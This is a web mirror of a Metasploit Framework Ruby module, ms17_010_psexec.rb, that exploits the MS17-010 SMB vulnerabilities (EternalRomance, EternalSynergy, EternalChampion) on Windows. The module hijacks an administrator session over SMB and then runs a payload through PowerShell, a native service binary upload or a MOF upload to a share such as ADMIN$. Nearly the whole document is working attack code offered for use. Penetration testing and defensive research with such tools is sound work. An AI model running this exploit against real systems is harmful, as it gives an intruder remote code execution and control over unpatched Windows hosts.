Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/smb/ms17_010_psexec.rb
32589 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
# Windows XP systems that are not part of a domain default to treating all

7
# network logons as if they were Guest. This prevents SMB relay attacks from

8
# gaining administrative access to these systems. This setting can be found

9
# under:

10
#

11
#  Local Security Settings >

12
#   Local Policies >

13
#    Security Options >

14
#     Network Access: Sharing and security model for local accounts

15


16
class MetasploitModule < Msf::Exploit::Remote

17
  Rank = NormalRanking

18


19
  include Msf::Exploit::Remote::SMB::Client::Psexec_MS17_010

20
  include Msf::Exploit::Remote::SMB::Client::Psexec

21
  include Msf::Exploit::Remote::CheckModule

22
  include Msf::Exploit::Powershell

23
  include Msf::Exploit::EXE

24
  include Msf::Exploit::WbemExec

25
  include Msf::Auxiliary::Report

26


27
  def initialize(info = {})

28
    super(

29
      update_info(

30
        info,

31
        'Name' => 'MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution',

32
        'Description' => %q{

33
          This module will exploit SMB with vulnerabilities in MS17-010 to achieve a write-what-where

34
          primitive. This will then be used to overwrite the connection session information with as an

35
          Administrator session. From there, the normal psexec payload code execution is done.

36


37
          Exploits a type confusion between Transaction and WriteAndX requests and a race condition in

38
          Transaction requests, as seen in the EternalRomance, EternalChampion, and EternalSynergy

39
          exploits. This exploit chain is more reliable than the EternalBlue exploit, but requires a

40
          named pipe.

41
        },

42
        'Author' => [

43
          'sleepya', # zzz_exploit idea and offsets

44
          'zerosum0x0',

45
          'Shadow Brokers',

46
          'Equation Group'

47
        ],

48
        'License' => MSF_LICENSE,

49
        'DefaultOptions' => {

50
          'EXITFUNC' => 'thread',

51
          'CheckModule' => 'auxiliary/scanner/smb/smb_ms17_010',

52
          'WfsDelay' => 10

53
        },

54
        'References' => [

55
          [ 'MSB', 'MS17-010' ],

56
          [ 'CVE', '2017-0143'], # EternalRomance/EternalSynergy - Type confusion between WriteAndX and Transaction requests

57
          [ 'CVE', '2017-0146'], # EternalChampion/EternalSynergy - Race condition with Transaction requests

58
          [ 'CVE', '2017-0147'], # for EternalRomance reference

59
          [ 'URL', 'https://github.com/worawit/MS17-010' ],

60
          [ 'URL', 'https://hitcon.org/2017/CMT/slide-files/d2_s2_r0.pdf' ],

61
          [ 'URL', 'https://blogs.technet.microsoft.com/srd/2017/06/29/eternal-champion-exploit-analysis/' ],

62
          [ 'ATT&CK', Mitre::Attack::Technique::T1021_002_SMB_WINDOWS_ADMIN_SHARES ],

63
          [ 'ATT&CK', Mitre::Attack::Technique::T1059_COMMAND_AND_SCRIPTING_INTERPRETER ],

64
          [ 'ATT&CK', Mitre::Attack::Technique::T1059_001_POWERSHELL ],

65
          # T1021_002_SMB_WINDOWS_ADMIN_SHARES replaces the deprecated T1077_WINDOWS_ADMIN_SHARES

66
          [ 'ATT&CK', Mitre::Attack::Technique::T1021_002_SMB_WINDOWS_ADMIN_SHARES ],

67
          [ 'ATT&CK', Mitre::Attack::Technique::T1569_002_SERVICE_EXECUTION ]

68
        ],

69
        'Payload' => {

70
          'Space' => 3072,

71
          'DisableNops' => true

72
        },

73
        'Platform' => 'win',

74
        'Arch' => [ARCH_X86, ARCH_X64],

75
        'Targets' => [

76
          [ 'Automatic', {} ],

77
          [ 'PowerShell', {} ],

78
          [ 'Native upload', {} ],

79
          [ 'MOF upload', {} ]

80
        ],

81
        'DefaultTarget' => 0,

82
        'DisclosureDate' => '2017-03-14',

83
        'Notes' => {

84
          'AKA' => [

85
            'ETERNALSYNERGY',

86
            'ETERNALROMANCE',

87
            'ETERNALCHAMPION',

88
            'ETERNALBLUE' # does not use any CVE from Blue, but Search should show this, it is preferred

89
          ],

90
          'Stability' => UNKNOWN_STABILITY,

91
          'Reliability' => UNKNOWN_RELIABILITY,

92
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

93
        }

94
      )

95
    )

96


97
    register_options(

98
      [

99
        OptString.new('SHARE', [ true, "The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share", 'ADMIN$' ])

100
      ]

101
    )

102


103
    register_advanced_options(

104
      [

105
        OptBool.new('ALLOW_GUEST', [true, "Keep trying if only given guest access", false]),

106
        OptString.new('SERVICE_FILENAME', [false, "Filename to to be used on target for the service binary", nil]),

107
        OptString.new('PSH_PATH', [false, 'Path to powershell.exe', 'Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe']),

108
        OptString.new('SERVICE_STUB_ENCODER', [false, "Encoder to use around the service registering stub", nil])

109
      ]

110
    )

111


112
    deregister_options('SMB::ProtocolVersion')

113
  end

114


115
  def validate_service_stub_encoder!

116
    service_encoder = datastore['SERVICE_STUB_ENCODER']

117
    return if service_encoder.nil? || service_encoder.empty?

118


119
    encoder = framework.encoders[service_encoder]

120
    if encoder.nil?

121
      raise Msf::OptionValidateError.new(

122
        {

123
          'SERVICE_STUB_ENCODER' => "Failed to find encoder #{service_encoder.inspect}"

124
        }

125
      )

126
    end

127
  end

128


129
  def exploit

130
    validate_service_stub_encoder!

131


132
    begin

133
      if datastore['SMBUser'].present?

134
        print_status("Authenticating to #{datastore['RHOST']} as user '#{splitname(datastore['SMBUser'])}'...")

135
      end

136
      eternal_pwn(datastore['RHOST'])

137
      smb_pwn()

138
    rescue ::Msf::Exploit::Remote::SMB::Client::Psexec_MS17_010::MS17_010_Error => e

139
      print_error("#{e.message}")

140
    rescue ::Errno::ECONNRESET,

141
           ::Rex::Proto::SMB::Exceptions::LoginError,

142
           ::Rex::HostUnreachable,

143
           ::Rex::ConnectionTimeout,

144
           ::Rex::ConnectionRefused => e

145
      print_error("#{e.class}: #{e.message}")

146
    rescue => error

147
      print_error(error.class.to_s)

148
      print_error(error.message)

149
      print_error(error.backtrace.join("\n"))

150
    ensure

151
      eternal_cleanup() # restore session

152
    end

153
  end

154


155
  def smb_pwn

156
    service_filename = datastore['SERVICE_FILENAME'] || "#{rand_text_alpha(8)}.exe"

157
    service_encoder = datastore['SERVICE_STUB_ENCODER'] || ''

158


159
    case target.name

160
    when 'Automatic'

161
      if powershell_installed?(datastore['SHARE'], datastore['PSH_PATH'])

162
        print_status('Selecting PowerShell target')

163
        execute_powershell_payload

164
      else

165
        print_status('Selecting native target')

166
        native_upload(datastore['SHARE'], service_filename, service_encoder)

167
      end

168
    when 'PowerShell'

169
      execute_powershell_payload

170
    when 'Native upload'

171
      native_upload(datastore['SHARE'], service_filename, service_encoder)

172
    when 'MOF upload'

173
      mof_upload(datastore['SHARE'])

174
    end

175


176
    handler

177
  end

178
end

179


180


181